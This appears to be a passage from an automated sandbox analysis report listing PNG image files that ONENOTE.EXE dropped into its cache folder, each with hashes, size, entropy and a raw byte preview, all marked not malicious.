SHA-512:	2614C04686299CEE8D56577A1E836A26076D42E041C627177FDB295629F6A80190910947FA794A094C55A45C3D70725EEF29097118E523A38B50C9263C771A41
Malicious:	false
Preview:	.PNG........IHDR.............gI......sRGB.........gAMA......a.....pHYs..........o.d....IDATx^..xTU..M..B...P........)vQpQ.ED.""......,."....bC..VT.. M!...@z....1...Wf.w..o29...=.v.TUU..^..@....S..<..;h...5.9r....x..7N{...=........'...N...u...9..5+YW.;..N\..u...9..5.....O....,.K..'.../.....1..T....>.f..9.xo...u.xo...u.xo...u.xo...u.xo...u.xo...u.xo...u.xo........'L...g.UVVz.[.n)...Yqq...Y.f.)//_.l.W_}.,........S^Z^Y..++...pF.....?...I.&...O,.k.d...~..w;Q........7}1y......e_............=y._U....{..}.w.O..~.z.{........W\q.."........^.h........}p.+.>m...d...4...`a~Z^....me......:N]..1...g..y.f.......l..g.).......e[........Z..RB.KrJ.....#...{..eff..v.[[<.n..?{.....SN9%...V.yE...s2..........e@Wz..I...B.r..<.-.=/t{.v.\|..J....,.@.A.v...s`/.....6f....L?.z[T7..)S0.;c....\s..z-C.....v..}Y..{..j..xF.....'.#_..C....k\|3..8...N...5......f....3......f)-.p..%.D.v.v.].f.......33<<......[bbbt.]w...:.r.....z....q..=....m.uhD..,..zXg

C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\tmp\0000001T.bin

Download File

Process:	C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
File Type:	PNG image data, 230 x 68, 8-bit/color RGB, non-interlaced
Category:	dropped
Size (bytes):	4181
Entropy (8bit):	7.950380155401321
Encrypted:	false
SSDEEP:	96:L6ousL3eslFAmjb89xK6YiSTwtw5dTA1W9lQ:GoFiUFAMbsxJYieZ5dGklQ
MD5:	BC6C08F8C2C6D1EEE95ABFC40C3C3669
SHA1:	44DE7375375880ACC24938D7E92A837E85C35321
SHA-256:	6E54B502C46E1AFA57E28B8ACCCE24F102399F31407827A91E4CD7A42FCBC746
SHA-512:	2AF4A9B87FA4F362926CD77F272CECBE3ED4F0E110FB8F30F661DF7C61B77B9FD8E7716EEF9177B1038B68C792CA4F844F729DAA48B2E38B9945EC9CB44BB720
Malicious:	false
Preview:	.PNG........IHDR.......D.............sRGB.........gAMA......a.....pHYs..........o.d....IDATx^.yp.....E-.......-v...VY.a.d....R.euF.).KH@.B..u@YdQ....!&.tjg.!.,a'.L..@H...{'\~yy.....w2z...s.=..;..s.......]..j..b5d.j.X...2D......r.\.#..f...Bl.....5dC....r...............:m.....s..j.f..jK....y.^....'8.....<......g.....=.%..2.p..}<.....G.....Ix.m.4dm..B.......0?..+_...c..n.......?....wa..l...p....E.Ly.}......C.D.vy).....@.>\...3;.`].q..m../.d.B.../......~.p.U..'...sP\....YH.7.../....R!...O...'.....s....<\|.f)....i.{.I..l.a.n...?~.{...h...s.e..-..Q..R..@<;.y.G.+n.....Y.Y'.V.}.o._..?...,.>}..\w....`+.}.{.p"d.RO=&.v..H].....k...X.c..z.{........}.n....s:c...i7N...\|....\..O.....)w..[>..E..}y....q..u.!.z.D.[`Uf.Y...>z\..x.B.h" \.}...`...\|._.....G...hY.../..6>..Z...8^..k.E.5d#..a."....P.CR....OL..U...qY.{.C.<~I=V..x.J..k.Y....z.;?..^...3.4\|i...[DL,..z].._..a.....(s./...W~..q*.\#@[R.N...@.."..=....\q...<.......p...+J..\#...(.,....OQ...$L...G...

C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\tmp\0000001U.bin

Download File

Process:	C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
File Type:	PNG image data, 453 x 278, 8-bit/color RGB, non-interlaced
Category:	dropped
Size (bytes):	14553
Entropy (8bit):	7.951135681293377
Encrypted:	false
SSDEEP:	384:EF7aDrPYJ1n3kaEf61xD+KvdokCixTQm7QA96dNT:EF7a/PMeaEf61lT6kCiFQCQq6zT
MD5:	3E9F7D399DF9CAD3669B7A5445EF7074
SHA1:	2FBC965DC03EF9203581F595E0D7AB1734726ED7
SHA-256:	76C80E31F37248C3C787F7972A7B22038390F9D81E72E650071A6F36D36AF27A
SHA-512:	326F8F9CBF829BF80AAA96062A57255A36EE04DE310634327AA075D14129CFA8E36E48AB2A00B10F9BDC1D94F1AC7A9E41D0D063361920A0332EC124BDF4C3EE
Malicious:	false
Preview:	.PNG........IHDR................R....sRGB.........gAMA......a.....pHYs..........o.d..8nIDATx^..xT...!=!$..%t..H.tP:.HQP@E,...QQ.^.....* E.(" ]:.K..R......p..n.9{...sv.}.....7.....o..z...,\|.......M +.....w........O...>.SJ.O...<...{. .x..g..I..H.......V .. .}.PO..H+$@.$@=.=@.$@.......VH..H.z.{..H...!@=.#...............C.z..GZ!.. ..)... .....T...B.$@..S..$@.$....>.i..H......H..H@...S}8......POy......>....p... ...... .. .}.PO..H+$@.$@=.=@.$@.......VH..H..zz?.......$@.$`i......c;.n..i...0..........<......S....w..c.....y..F4.p..3~..\|.]....s.6[..H...N@.=M..\|`...3./...I.....'..\|..K...r\|...nX...'.. .G...ib\|...MY8\|......9x..Ur'.. ._ .....5..H..d..L.$@..I..o.;kM.$.?........K/.wn......Y....E..%K.=.......Y.3.!k....[V..WG/?i..H..." T.,z...6h.[..-%9....WMY...z.vH..H@/.BOe....g-P.@.......lH.O...SJ}5.\|....?.^..5^}..$.. .....S.@...<.gJT/......_.R.C.....rj..Cg'\K........K....~Y....l@..)..l.k.s..Yr.....Z]jG..q.+..G...;lNJj.}..T1&&.. .....?...\|....W<{...g.&'Ca

C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\tmp\0000001V.bin

Download File

Process:	C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
File Type:	PNG image data, 454 x 278, 8-bit/color RGB, non-interlaced
Category:	dropped
Size (bytes):	8184
Entropy (8bit):	7.807848176906598
Encrypted:	false
SSDEEP:	192:ExqMHYnnEnntvA4Mesu3SXHycmfIEFQp1r/:E0MGEn29esuiXHt0FQp1
MD5:	5B386BF9A20766956A84F67F913F23D7
SHA1:	6E72E51F5B4FA64E52D2B80B41409B3DB927A3C7
SHA-256:	DDF6A1D5B29BD69C65A148B1247FDE8389CC56865E4398E4CBDCBD68A6555043
SHA-512:	99B4109439D9A688D7747C6847E0FF7399CDA01A89C3181789F913E757A82EE4727F95E506F4B01930EFC7C6E229B94BB89E385B56BC009AB5CFE332585660C5
Malicious:	false
Preview:	.PNG........IHDR.............s>.Q....sRGB.........gAMA......a.....pHYs..........o.d....IDATx^...]...!.......!.YTP.A......-..r..$.E.J.I;....T.M.UE[..Q..x....wKB=.m...4.%..\|:...9...\{..o.3..g.o~..~s...k...X.r....... ..@Gggg.?.... P_.]]]..Iu....C...h..$...:... ..... .\.......@R..... ..$.k....@0.Hj0.8... ..r.@....F.I...G.....T...@.... ..P........5...@ ..$5.J.A...@R.. ....#...C.#.@..H... ..`...`(q...@.I..... ......%. ... .\.......@R..... ..$.k....@0.Hj0.8... ..r.@....F.I...G.....T...@.... ..P........5...@ ..$5.J.A...@R.. ....#...C.#.@..H*... ..`...`(q...@.I..... ......%. ... .\.......@R..... ..$.k....@0.Hj0.8... ..r.@....F.I...G.....T...@.... ..P........5...@ ..$5.J.A..............W_...1c.l..6..`...@ ..I.S..I.I'...5.\..;....'1. ...........c..k.u.Qs..}..g#b.j.@..Y..QR...n.!...-......h..Z.......Xw.U.~q... ..@.%.'............. P..E.T.b.:j.(F..p.... .C.}3.'.\|..z..w.a.....\{.:.4[.lY..~...x..'/....g....J..9.K_...'...:..;)......SO=u..E... Py.qf..}O7.o....u?:....6~~..9...?7.

C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\tmp\00000020.bin

Download File

Process:	C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
File Type:	PNG image data, 213 x 85, 8-bit/color RGB, non-interlaced
Category:	dropped
Size (bytes):	1924
Entropy (8bit):	7.836744258175623
Encrypted:	false
SSDEEP:	24:rloPN36BoJ9JK5lncTww67QKf5wX5YgM5s6cahePwnR6+eA9zQU13ALcVz7wTQ8U:rYN31JH6lcbjMW5Ytmyqwp9H7wY
MD5:	B1FDE66F75507567B5F0C6C07B01A3A1
SHA1:	80B8E6A923E853232F66C874367E90B5C9CAD7AE
SHA-256:	B9C82D2F31BBE409D159EE3C9129CBAAC7C6F6C81637AB9B6DAB3C11AA74B7F1
SHA-512:	FC8C6038D3C2F5765D7524E969574ACD10AF6FCCFD45FE7C6DD4A8C2669B13EE3FB1A8833E94A046AB7037018170B5B87B1A2742E0E10557C413AD634BDF343E
Malicious:	false
Preview:	.PNG........IHDR.......U.....Q.6.....sRGB.........gAMA......a.....pHYs..........o.d....IDATx^.].O.W....G.lT^M..J.....".4....j..H..R^.".m..5....&..j..B..`.`..>...X......]z.[&.>..ef..gB.d...s~.=...3....m..(E...~.[....... .. .E3..7.4.......}..H._.D.,j.)..q\.....7..#.ag.o\|.?.......;C\|.#.../v.H.......o~.{G......H.\|..;..v...G.._...p1d2..&......QS4<..i.".X.....1(..GR.R#.}.!.E<..:LLM......s..:"......Fa...b.....\.T..~OD... ..:j.~..p=Y...Y......?.Y.A...0!6_p.dKctjvZ....\.........V..1)..:.....;7:...(.[...7.....u..'ra.....S.]..........7.#,[..<.l.....[.........90d[.2a.R.........E.CJ..C..S..*._...$^...Q..:>hx.k7.`jN:.W.X..N..p..K..."...q....a.Uy.......[d.:vmkk./cW.>.K..C..?\d...'.@s_.?&.....V .?F..;k.....%+....+.3bk......f....T....S.(2.=...?gQ...K.._,.#....?.1W.......m2.....Z...-..:..?.#J......KS.P\|&[<..........Dd.....\.....W$z].k..-..8...>..Q`Yz.}w&..._......?.)_[T...:wy...O8.Om......l.....\....]..."f...........q.o.V>~s...-....N{.n....w..O\|.D...

C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\tmp\00000021.bin

Download File

Process:	C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
File Type:	PNG image data, 453 x 278, 8-bit/color RGB, non-interlaced
Category:	dropped
Size (bytes):	11886
Entropy (8bit):	7.946442244439929
Encrypted:	false
SSDEEP:	192:sqNuEpzsnKxkfLaZCdMh+cLApmRausyZwYMAisQKShDBlhr34ckckcZ:JNu6DMLaZsMhtLAIa0wYMAvI5V4DDQ
MD5:	875CFB3B5C3619253223731E8C9879E5
SHA1:	6372F4F5BEB6EEAE3EDBE5B62EE73039B40AD01E
SHA-256:	CC69BAE5D2C8F56B28BA4E3C6A11F57C4E8CCCE69943ACFBE7E63B4FC90EE5F2
SHA-512:	47F45A3275B8454F8000F4567153DD7D4AF3012005D8E34CB18AED6AD69083BEC753E607F275FBF3EFCCB7BA00310A04ADFBD5FA5B73E6BBE47CE73901C35CA8
Malicious:	false
Preview:	.PNG........IHDR................R....sRGB.........gAMA......a.....pHYs..........o.d....IDATx^..x.U..I...JB..;H..."..(U.EE\\..._v]W..b...Az..{G:J..B.$...H.IHB.o2xE..3gf..w..2....w..s\|.....C.$@.$.....t.!........8......RR....<...6..P\|\|....$@.$@...PO..$@.$ ...T.GZ!.. ..)c..H........H+$@.$@=e.........S1.i..H....... ...C.z.#........1@.$@.b.PO.p... ....2.H..H@......B.$@..S.......!@=..VH..H.z.. .. .1...b8......PO..$@.$ ...T.GZ!.. ..)c..H........H+$@.$@=e.........S1.i..H....... ...C.'++kH.G.=Z!.U...73o^.IH..O\|jrj.D.......I.M.........Kph.............R.x.......RU8_".......j.......B"O.z.\|.9.."..L....Y.d.Rej.-Y.dhX....:.xH.z.!(>&..4.....O.<..T\.%a..e.....UnR....+j...2.."..M.O>.z......T...].j....m...S.`..&..)....f..2..............+..SP..?.a...=.....3......K.zj.5.fP.......2:..?.....%....d.qxC..W.~.._....!.W..6....iJ).(..wg.}.]sw\.r]...r"...e_-....5_9.YN'...PO-.d.:.%..wZQ...H...JMJ.6c....\|g..,.3.....T...o..Nyc.W.....A.3.._...U%...PG.z.....&.%.v....AIm.....~.

C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\tmp\00000022.bin

Download File

Process:	C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
File Type:	PNG image data, 171 x 50, 8-bit/color RGB, non-interlaced
Category:	dropped
Size (bytes):	2270
Entropy (8bit):	7.845368393313232
Encrypted:	false
SSDEEP:	48:3Cxnazs22lovji2Ez2iqBU2C+hJWizJNzIu1coqAYClBeMsk1:3dm2Ez2iUhBzhyjAxqQ
MD5:	6EFE6733E10E011FFDD6711B5F37C9E2
SHA1:	C72549E824EAD899944A38C46FBC28BDCDAAD611
SHA-256:	92B5056DAA03DF3EA85AF49FFE4F9CFE8699BDF3539576A99F02418FF49AD9CB
SHA-512:	EC14B553A5780CD9B33D438CE13A6932DE43E346D8D2DEC8D093A6A2048675423948F8E2C604A73460980C3C68D9276B65D76C2A6BC7B24FDF10CA92FDA2583E
Malicious:	false
Preview:	.PNG........IHDR.......2............sRGB.........gAMA......a.....pHYs..........o.d...sIDATx^.\kL.W....F......@..(H4."iI}..B!.iD...I-....y.I.h.....<..1.....C..(XSy.l....,-,.......3..3...;.{...{.{g.....Q..x.T/q...F.V...B..'..?{:.:...`.........+.0s.e...w....{.`. ....5...d..9S]../............$Y.>.I....i..8....;,r8r!Ee'"..!.&E.....n...=.@..Sp.GF..c....1QH3....?,.T.el......t?..([Q`.0....k.G.....X..C...k\|p...I.q;.d..N....c.u.a.5.%.k.fS\)..H..T.~lk.[.n...x2.1...........%...yK..a..l.[.?#..fD%.FMT. =r.jt^..fT...c.&..Lr..............\..V.ll....Br^6..U27...O..N..K.gm.K..g.;..l..Fe...w?..Q.E......0.........7...(.e..t...x.c6..Q..n.92:%....l..4.h]Z.....w..\|..!.p.~..B.y..&.......gl...\.wI......G.6.K.$...%.-.h]\8.LT.....}{a...^.i......4.0.ji...........n.pk ......7t....U9..b...I.....#...<q..(\|=F.......0@^......+..........X. .>p....S..t.].f.x.0....7d..n..'..'... .M.qqn...G.t8'.=..V.PK....K...X.z.#..I.....@...Y....BH..I.....,..K....=`&Z.41$..a'o.:....i{o

C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\tmp\00000023.bin

Download File

Process:	C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
File Type:	PNG image data, 453 x 278, 8-bit/color RGB, non-interlaced
Category:	dropped
Size (bytes):	16003
Entropy (8bit):	7.959532793770661
Encrypted:	false
SSDEEP:	384:1l+zN+iNurNE/tBdEC/vkape2XHYdhOm+Bl6C4:L+zN+iNurGNEC3fpe2X8Pa+
MD5:	3A5CD52E925A7C4A345047D8F06C3C41
SHA1:	9C02828D83206BBD3EB58930C8C65A6CA5DBCF40
SHA-256:	477277E8CAAAE1D3B3EAB5B3660239AEEABC433743A191727B1A71E529872AC7
SHA-512:	8D8B6AC645ECC7C8BD374E6190819006C71AC0B5993419C42463009116214E5EC4B4235D94B4AE4CDA132E7DDA9807ADC51525824AC5F12696517FFC8890891E
Malicious:	false
Preview:	.PNG........IHDR................R....sRGB.........gAMA......a.....pHYs..........o.d..>.IDATx^..\|.....+)..H..C.K... ....x).rU..T..E...;.....@Z.....@...9q.g7[fgggg.............1//.."@....0..#.t..f.C..."@.....@OIR.#P...0..$...y.Pl"@....( @zJ]...." ...Si8RD.....S..D....i...J.R!.D....R. .D..HC..T..... .D...... .D@.....p.T... ........ ... =..#.B.... =.>@........4.)."@....).."@...4.HO..H..."@.HO...."@..!@z.GJ...."@zJ}...." ...Si8RD.....S..D....i...J.R!.D....R. .D..HC..T..... .D...... .D@.....y.?.`.T... .f.P...$47........~E....!.D..X............].`....0..N.a...>[\|\|...t.T.w .. .....)'...=X?c.......+OE....<-84...=.....w.8...7.Ro&.D@!...GS.....s.......:...Gg..8..T...u...~..............<...S...../Y.......W........#. .vB...u.. .+.999YYY......wf..._.{6....=..]>Y?..;=02eb......2...;.%..\...P..R5....XMO.....6....W]...3g.5;.n{t.......F7S....r...[n.......AAX..j[.j.;.neef).2.....{ ..r..{7.-........i..S........<..pm.u.V....M.333....K..Mr.s..Ek..=t_.#.P...

C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\tmp\00000024.bin

Download File

Process:	C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
File Type:	PNG image data, 454 x 278, 8-bit/color RGB, non-interlaced
Category:	dropped
Size (bytes):	13241
Entropy (8bit):	7.931391290415517
Encrypted:	false
SSDEEP:	384:a99pmP85w/MAMszG+iHGgrw8Ld+9aEsjQR:mgP85AMs6+UtrX+9mjQR
MD5:	01367FEEE0A83E8765E971E0D3740900
SHA1:	CAE1FD22CE2539FA2ACC0242C615CB7EA3F866E1
SHA-256:	18B8E53505DA3C412890F4D74AE2A6B26C4B0827E15E830F92A024D292AF20ED
SHA-512:	8CFBDC014C42AE6417038B80424D2E9FBDDD7DFDDF579E349C3C17C9B52AF33A72463154D29539457C4ADAB2DB00CC28A67902FA8D9209E4AF00EDD46D52E5CA
Malicious:	false
Preview:	.PNG........IHDR.............s>.Q....sRGB.........gAMA......a.....pHYs..........o.d..3NIDATx^...U...Y.]:.T...G.5..lX...B..Xb4F,I0X.....F...("vET4H......EX........wo9..9.\|...rw..;...;o......z.....B.......v.mn..>......E."....U...4s! ..F...u?.@...! .~F@... ....p..Q.kP.#! ...(U{@...!....T.TGB@...Q......B.5.D..A.......~..U{.].....S.e...K.A.......7^?....D...h;...!.Eu...o.^..B@..# J...B@....(.5(....B@..= ....p..Q.kP.#! ...(U{@...!....T.TGB@...Q......B.5.D..A........T..! ...k..R].R...! .D...B@..........:..B@..R........! Ju.Ju$......j...! .\C@.....H...! J....B@....(.5(....B@..= ....p..Q.kP.#! ...(U{@...!....T.TGB@...Q......B.5.D..A........T..! ...k.D.RK.K.m.V.......(.^^^ZV^Z.7.a..........T..xsqYi....L......z....}....?..yyy.M\.b..U3W.0{...~.`}..M%.J.w.mdv.&..@....R..o/.^..5...x.g.>..ag....GM\|t....\<s..y+6.X.? ,.R...-.W.m\..o..0g..i...h..W.Z.i...2.....o.&..@...-.B\|.K..^.....u.}.M..6...,(...e.V.X........nkE....5.8....-.!.TtRxs....Q..2}.-..`....mX6i.w...

C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\tmp\00000025.bin

Download File

Process:	C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
File Type:	PNG image data, 164 x 89, 8-bit/color RGB, non-interlaced
Category:	dropped
Size (bytes):	4190
Entropy (8bit):	7.94161730428269
Encrypted:	false
SSDEEP:	96:GHfueo3dRLZKOSYDzGsEgfB9nqS0WKt/z2jOrrz7yrT7N:8A6AzZfBtqS0WKNC2vyx
MD5:	8B3AEC1986A522951942BA72B85CCAA0
SHA1:	7E0DC78FC65EE4C804A4B0C72AA53E2DFDF26C14
SHA-256:	8B02CEC726DECF033B67689F369FDE1002ACFD5F8C32E0F248AC575997204F2F
SHA-512:	8EE1A1F6F0023EB4F60760C2E23EAFD56E6D298CAB49D819CF1D62C0CCF608D4211D3767856255F7CF8FF45AD835FE5475EB92C608989C522CD48D00A050B189
Malicious:	false
Preview:	.PNG........IHDR.......Y.....?.......sRGB.........gAMA......a.....pHYs..........o.d....IDATx^.]ip...fu.VBBZ..V'.>........CR......?r...pU\....v...T~.U)0..('`....."..,a..Y..$t!...D...Mkvf4.VhW;S........{...zZw...i......fj..$..7......[Z.[.[..Zk...?.t:M..,..`.^...X,..sUK[..Rg.=$..!.3<....74...iY..i...k.,.fA..Z.n...`G.%..H.l7..7J...u.R..6....E..!....N@.....M....Q`...U2.w.WP[!fX......c ./@7Mz....^...k.)....v.Q`..z..1A..P.{...\|\|...vY.....>.`...K...m.?CX./v.8.....]..;...6..kw......N....z.Q...f..q..xk.5....;.?.Z.c...`......4....?.....VV.u~..<_......sU4e.....g.c.G....O/..r...`.G)....#d5.O..w..{....twL1l.)#&hF..K...M[@.Dl..V2..j.3..s....3M.....v..!....V..c..B...\|..e.1....7.WA0.[.\.u.).$7f.+.......8..e2K/.%.Ii..`w6w.E..[?_.?.?..I.k2.s....]..f....HM.?w..d.9..Rr....Y.c.}.s.zk..rc...a..I(9~........m...Z............I........7.K:.:Bf.......m..1.......&..,...?a...c.@.@.g%...s.#...;..c6...g.lZ....}.WX.3.8.....W....N.w...L...}....?.".......;cI.............pS

C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\tmp\00000026.bin

Download File

Process:	C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
File Type:	PNG image data, 162 x 89, 8-bit/color RGB, non-interlaced
Category:	dropped
Size (bytes):	4081
Entropy (8bit):	7.943373267196131
Encrypted:	false
SSDEEP:	96:KQJAeRumk2zXWySlEmWL9zi6wknB4qLx+ppNhQrW8Oy:Ke9S482LE6wQB6pNeqi
MD5:	29B87BEEC5D3899824AA390530CD47FB
SHA1:	55108E8E5692E4444F72EE5CEB91915E7A2AEFC8
SHA-256:	F00E4F1C9B1D9ABEAAEC8E5CAB02A07FD74F00ACE15E36C6F6469DE5AB07A9FC
SHA-512:	1A5AD45BBA8C29C32CDD3C4D1E460C30ECA305D851FAAC73DF165306BC338337525680B9906D367A0CD3852B9D2DAAA8FD0603276BA969495B4E29C7EC8A3530
Malicious:	false
Preview:	.PNG........IHDR.......Y.....2.h.....sRGB.........gAMA......a.....pHYs..........o.d....IDATx^.].LTW.f..O.a............k...M.Z.n.q.h....ht.f.M.n.6..t.h.k.h5.6][[....X..p...?..g.`..7.o..of....^.ys..{.{...s.UMMM.(.l.@.l..R?.......(0+0.......5....F..#.].........1.....B[>[..a..L.....x...0.5t.v..S.h!.........Y....B..&.......f#.w5u...............0...x.sC....a.4j5V..Z..n....K..>...3t..wm..3hB.BD.P..FkcJ6.....O........7...S.........6..P.]mf.+o....w..<.......Y..Z.whd.....zf+.....#."_?....`.._... qf+.?.?"k...zgME..j..!.k.U.....&z..N....ma.......R.{.r0.S..KP..fU....g~..=..Q.n.. 8T=/'9,.KDW...GN;0(P3_....1......'.;..;\|.L.a.&<\.d......o...Y... {E.F..}.e.\..=W..#..W....c./~..b.EWXI.#.''&.........:....X...b.....+2...5..6+)we~ja:lZ.d.Ey....l.2.5r........!.!._\|.A.....j2.5.o.....WOM....V......GC9..'.... ....C..,._...cS....b.1.....t.........._........a.3..K..>V.f]...~....K...-........#.o.Y.P........a.7..,#..'s...T.....b..]..3..dPPP..Y.i...c.b

C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\tmp\00000027.bin

Download File

Process:	C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
File Type:	PNG image data, 452 x 277, 8-bit/color RGB, non-interlaced
Category:	dropped
Size (bytes):	22634
Entropy (8bit):	7.974332204835705
Encrypted:	false
SSDEEP:	384:5ojjyi45m1/9gyhgFsH1ud103Pl39o0qjfsH37mNHy7QPaNbZy0:+r45m1/BWKy10tN22rmNHycobE0
MD5:	548D234C9AB4021CA5FAB7BF22502465
SHA1:	2F7495D250DC86EA99473CC342D164B859926021
SHA-256:	7D549C3418CD90F42571D00936B23D242837CE2A8B19FC4C719E182ECB2624C6
SHA-512:	261523F5EAE6FCE2829B53AAC5938B1A0021C119E00CE82EFFDBD690FE71064E0F3B313ED1AB2F67A16C488AD5B1A91F5AF98029D88A7896F271C108410D42C5
Malicious:	false
Preview:	.PNG........IHDR.............._......sRGB.........gAMA......a.....pHYs..........o.d..W.IDATx^..i.=YY6z@..DP.i.IAA........l.Dd0"p0.ON.~....s>.?zbH8..%$`....b7..=....25.".L. ..u_..f...j.........Uk..^UW]...u..}.{.]t.-.(...J......e...t.....@i.k......_.(.....@...Z.6J......2.O.-P....._.u.=T..4p...e..q..5^f~....@i`....?.....@i..k.........?...u..O\|bN.~?MbT%...@.LO.Or.`....$..y.{..o....~..(.;......SNi...6....w....~.{..^w......~.S...g?../\|.O........7_...Oj....\|......40......9....?..<.3nw...x...g...7.....(<.d...(3.K...;....\..:...'.5.....&...>...t.;....8..SO;../...._.}.{..D.jt.......jc...s..........Z...0q...@......Z]S.(..o.....Og.u.l.i.-.9..)j..~...5.l}..........G......k....Z..c.....}.c.?.\....t+u...15p.....[\|......2..;..;...........w...........v.7...I.-w...K/.J...[..N.....W..U#...._.j(...//z.\|..kv....];j\|../m....t.9.;-0.:.4p..@K.....~.9.$qu.E....!.9\|.m.+`).\|......x..vak-].../.....G'....4.>B6$.......-o.q..L;.N+....>...=.!.Y..Q...?......7..,....}

C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\tmp\00000028.bin

Download File

Process:	C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
File Type:	PNG image data, 453 x 278, 8-bit/color RGB, non-interlaced
Category:	dropped
Size (bytes):	17289
Entropy (8bit):	7.962998633267186
Encrypted:	false
SSDEEP:	384:ruwwXKZuqnOnZprU3+OXBruY4UkcY+TpI/BSqCrEoMXMEr3KbzHIDqqAmk+xob:tGcxE4PBruV3Uy5SqCAoMXzrQHoqAk+m
MD5:	708E8EB906BC105CCA0535AE669AA651
SHA1:	38D82DEDFE97D3001188C2E18FE13BD741FD520F
SHA-256:	1C3D07765294566E17270D0F3B9257A3DB7905D4E7EF746AEE80CD591CE0308F
SHA-512:	1EFC74C28190DEE2D2732390B74049A1B120F05EFB8DC6925207C6990AD20450FFAB40249899A9DBB82E8F92A61F770E120A450CAAC7F8C5F0742586CCE0EDB6
Malicious:	false
Preview:	.PNG........IHDR................R....sRGB.........gAMA......a.....pHYs..........o.d..C.IDATx^...Uc.._"oB.Hr.m(.0......r..[1.D....R..q)%FBDiB.."w.k.Jz.Y..l....>...9{.......g..Y.z~..k?.z.^k..+V...! ....(.....\sM.tD@...!P...HW.S....u^.....@.r.^.....B@...U.H.J....... }....".....>....! ..A@.4..EE...! }...B@....i<8.....B@.T2 .........xp..! .....d@...!......(B@....S....B ...O..QT........! ..@<.H......! ..O%.B@...x..9...C'\|..{.>Z../~^.s<<V4..ujo..v.Z7..EwT.....@.....?.......~{...K.........C........bB@.$.....C.{....Kf'S.....T.&....@<.....'..D`...;~v.DT]...r!..>....ru...}.....#uG.T.....>..z ...3v....P.M.....5.@<...?....F.}..c.W[.._!P...O..>.M.d<..J....E .}ZZ.+.5v.p>..N.{B....>M.Nzfb...OB@.." }.D.y...IdK<..! }.:.....f.K..bX.T9...&T.&?.VB9.[B@..@@.4..1}.4.@H..-!..}..~M.<.z..I}.G....>..S...N..@yj..n..s.d._.....(..R"....Wf\.oO.^...\h.\.`)...ni.'.].vk.1-.k.^....#.,}.{.RM...~Z.S.. .@U!.&}......h...{K..@.........W.8.N.s.Y.0)..f+...%4.......5.@j.):k.+3...I..(

C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\tmp\00000029.bin

Download File

Process:	C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
File Type:	PNG image data, 452 x 278, 8-bit/color RGB, non-interlaced
Category:	dropped
Size (bytes):	13737
Entropy (8bit):	7.916899917415529
Encrypted:	false
SSDEEP:	384:jgxmx2Fa/+76A6M6Y7rSYRv47cwbkkapeIiRmDGd+gUwOSpQ:KgyoWrJWRkkRXmad+gE8Q
MD5:	830632032C7DDBCCDE126F4BAE935540
SHA1:	9FEF1DA9FF1D7762B779553B5F873BE54C8D01EF
SHA-256:	2328D09EC845433DC31808FD6B12616F1D28B9B3BA7DD969ADEB6C32D8EB049A
SHA-512:	5C17EF9A0063499F2C34FAB2C4D968D29E20F20868921FA914E5737995AA0C166F224995109FF7ACA57B5B0F8647715DC670C4AEE385F61B5F8E6E8422C49EA8
Malicious:	false
Preview:	.PNG........IHDR.............w.pl....sRGB.........gAMA......a.....pHYs..........o.d..5>IDATx^....E...,"o.....&....AY$....AE..".l....+G.>AP@D..e..".".A.Y.@...K..IXB !..!..c1.On...===3=.3=.>9O..u....w.z..-].t9]B@...!.......Z...B@...^G`.Q.&S..u$d....B.Y..P.w5[]......B.m.D...! ..@...Ls.Q"....."S....B ..D.9.(.B@.....b@...!..."..@..! ....T1 ........i. J....B@d....B@...4..%B...! 2U...! .r@@d....!............9 2..D...B@..L..B@..........D..! .D...! ..@...Ls.Q"....."S....B ..D.9.(.B@.....b@...!..."..@..! ....T1 ........i. J....B@d....B@...4..%B...! 2U...! .r@@d....!............9 2..D...B@......5jT.@.{..O.;k....>.._o.+......{V...&C..(?.m.....F....gd.....?.....3u..x^L.1n^...@../.....XE....L..!...t.....L..B.).=..sn..U........@.O..$..o..L.....g.(D...(....Lo8.....,....f;o..i.f.h.9........\./..[W.9.....+....,X..+.d.....Xc..7.p.m.Yg.u:YO.V..l.t.].Z.g.U...]...5.^..._.~.WL...o.3f..s.,Y.X.7.x5...K/-..._.......{........W.(Y....?...!....W;.....iwNMW.............@+Q.5.#.

C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\tmp\0000002A.bin

Download File

Process:	C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
File Type:	PNG image data, 185 x 76, 8-bit/color RGB, non-interlaced
Category:	dropped
Size (bytes):	2332
Entropy (8bit):	7.8822150338370776
Encrypted:	false
SSDEEP:	48:jB5Gg4vMs30WIn5IVeRy1bY7DqbqQBAeNjukXlN4AXat:PGYuEWV/YH7e1uA0AXat
MD5:	91CB7F1273AA003076401081B8A22237
SHA1:	5157144069E7D2FDAE60B397BE5851E75BDF7707
SHA-256:	80682DD6472E8D1136BC5E20F6DE87B595562414B19EAB8E965736FE992921B0
SHA-512:	5A8E3C0ED0DB94BFE359C63793F12F3D7B3C37F3A13A5C96634BA1DC8C9E50FB1142FE4752FD9FBFA39A682F78C54AF868AD337EAA787801FE5F66D8F55A8196
Malicious:	false
